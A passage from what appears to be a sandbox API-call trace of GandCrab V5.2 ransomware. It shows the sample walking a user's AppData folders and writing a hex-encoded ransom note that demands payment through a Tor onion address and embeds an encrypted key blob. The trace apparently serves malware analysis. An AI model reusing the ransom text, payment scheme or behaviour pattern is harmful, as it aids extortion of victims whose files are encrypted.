lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503378 [0070.435] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.435] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.435] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.435] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.435] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0070.435] lstrcmpW (lpString1="Access", lpString2=".") returned 1 [0070.435] lstrcmpW (lpString1="Access", lpString2="..") returned 1 [0070.435] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Access" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access" [0070.435] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\" [0070.435] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.435] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.436] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.436] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.436] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.436] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\\\TITWMVJL-DECRYPT.txt") returned 76 [0070.436] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0070.437] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42